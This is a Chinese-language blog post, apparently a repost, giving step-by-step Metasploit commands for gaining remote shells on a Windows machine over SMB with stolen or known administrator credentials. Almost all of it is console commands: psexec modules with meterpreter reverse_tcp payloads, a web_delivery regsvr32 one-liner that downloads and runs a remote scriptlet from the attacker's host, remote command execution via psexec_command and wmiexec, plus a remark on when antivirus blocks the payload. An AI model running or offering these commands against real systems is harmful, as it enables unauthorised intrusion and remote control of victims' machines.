通过MSF使用SMB端口远程连接目标的技巧

栏目: 服务器 · 发布时间: 7年前

内容简介:使用exploit/multi/script/web_delivery 生成恶意dll代码

msf > use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > set rhost 192.168.2.118
msf exploit(windows/smb/psexec) > set smbuser administrator
msf exploit(windows/smb/psexec) > set smbpass P@ssw0rd
msf exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/psexec) > set LHOST 192.168.2.145
msf exploit(windows/smb/psexec) > set LPORT 4444
msf exploit(windows/smb/psexec) > exploit

exploit/windows/smb/psexec_psh

msf > use exploit/windows/smb/psexec_psh
msf exploit(windows/smb/psexec_psh) > set rhost 192.168.2.118
msf exploit(windows/smb/psexec_psh) > set smbuser administrator
msf exploit(windows/smb/psexec_psh) > set smbpass P@ssw0rd
msf exploit(windows/smb/psexec_psh) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/psexec_psh) > set lhost 192.168.2.145
msf exploit(windows/smb/psexec_psh) > set lport 4444
msf exploit(windows/smb/psexec_psh) > exploit

exploit/multi/script/web_delivery

使用exploit/multi/script/web_delivery 生成恶意dll代码

msf > use exploit/multi/script/web_delivery 
msf exploit(multi/script/web_delivery) > show targets 
Exploit targets:
   Id  Name
---
   0   Python
   1   PHP
   2   PSH
   3   Regsvr32
   4   PSH (Binary)
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 192.168.2.145
msf exploit(multi/script/web_delivery) > set lport 4444
msf exploit(multi/script/web_delivery) > exploit 
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.2.145:4444 
[*] Using URL: http://0.0.0.0:8080/s7sa27EEtl
[*] Local IP: http://192.168.2.145:8080/s7sa27EEtl
[*] Server started.
[*] Run the following command on the target machine:
regsvr32 /s /n /u /i:http://192.168.2.145:8080/s7sa27EEtl.sct scrobj.dll

auxiliary/admin/smb/psexec_command

使用 auxiliary/admin/smb/psexec_command 在远程目标上执行命令种恶意 dll 回连 meterpreter ;

msf > use auxiliary/admin/smb/psexec_command
msf auxiliary(admin/smb/psexec_command) > set rhosts 192.168.2.118
msf auxiliary(admin/smb/psexec_command) > set smbuser admin1
msf auxiliary(admin/smb/psexec_command) > set smbpass P@ssw0rd
msf auxiliary(admin/smb/psexec_command) > set command regsvr32 /s /n /u /i:http://192.168.2.145:8080/s7sa27EEtl.sct scrobj.dll
msf auxiliary(admin/smb/psexec_command) > set payload windows/meterpreter/reverse_tcp
msf auxiliary(admin/smb/psexec_command) > set lhost 192.168.2.145
msf auxiliary(admin/smb/psexec_command) > set lport 4444

msf auxiliary(admin/smb/psexec_command) > exploit

经实验表明,当目标机器有杀毒软件的时候,会拦截其从服务器上下载恶意 dll 文件 s7sa27EEtl.sct (测试机为赛门铁克未授权版),毕竟 msf 的恶意dll 特征码已经被杀毒引擎收录,如果确定目标机其没有杀软便可使用。

auxiliary/scanner/smb/impacket/wmiexec

msf auxiliary(admin/smb/psexec_command) > use auxiliary/scanner/smb/impacket/wmiexec
msf auxiliary(scanner/smb/impacket/wmiexec) > set rhosts 192.168.2.118
msf auxiliary(scanner/smb/impacket/wmiexec) > set smbuser admin1
msf auxiliary(scanner/smb/impacket/wmiexec) > set smbpass P@ssw0rd
msf auxiliary(scanner/smb/impacket/wmiexec) > set command ipconfig /all
msf auxiliary(scanner/smb/impacket/wmiexec) > exploit


以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

Persuasive Technology

Persuasive Technology

B.J. Fogg / Morgan Kaufmann / 2002-12 / USD 39.95

Can computers change what you think and do? Can they motivate you to stop smoking, persuade you to buy insurance, or convince you to join the Army? "Yes, they can," says Dr. B.J. Fogg, directo......一起来看看 《Persuasive Technology》 这本书的介绍吧!

SHA 加密
SHA 加密

SHA 加密工具

RGB CMYK 转换工具
RGB CMYK 转换工具

RGB CMYK 互转工具